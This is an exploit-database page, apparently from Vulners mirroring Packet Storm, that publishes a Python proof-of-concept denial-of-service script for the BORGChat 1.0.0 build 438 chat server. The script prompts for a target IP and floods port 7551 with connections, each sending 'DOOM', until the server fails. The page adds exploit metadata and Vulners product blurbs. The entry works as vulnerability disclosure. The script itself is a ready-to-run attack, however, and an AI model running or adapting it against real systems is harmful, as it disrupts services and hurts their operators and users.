Lucene search
K

BORGChat 1.0.0 Build 438 Denial Of Service

🗓️ 25 Oct 2018 00:00:00Reported by Ihsan SencanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

BORGChat 1.0.0 Build 438 Denial Of Service (PoC) Ihsan Sencan 2018-10-2

Code
`# Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service (PoC)  
# Dork: N/A  
# Date: 2018-10-22  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: http://borgchat.10n.ro  
# Software Link: http://borgchat.10n.ro/download.php  
# Version: 1.0.0 build 438  
# Category: Dos  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
  
# POC:   
# 1)  
  
#!/usr/bin/python  
import socket  
print "# # # # # # # #"  
print "BORGChat 1.0.0"  
print "# # # # # # # #"  
print "\r\n"  
Ip = raw_input("[Ip]: ")  
Port = 7551 # Default port  
  
arr=[]  
c=0  
while 1:  
try:  
arr.append(socket.create_connection((Ip,Port)))  
arr[c].send("DOOM")  
print "Sie!"  
c+=1  
except socket.error:   
print "++ Done! ++"  
raw_input()  
break  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Oct 2018 00:00Current
7.4High risk
Vulners AI Score7.4
28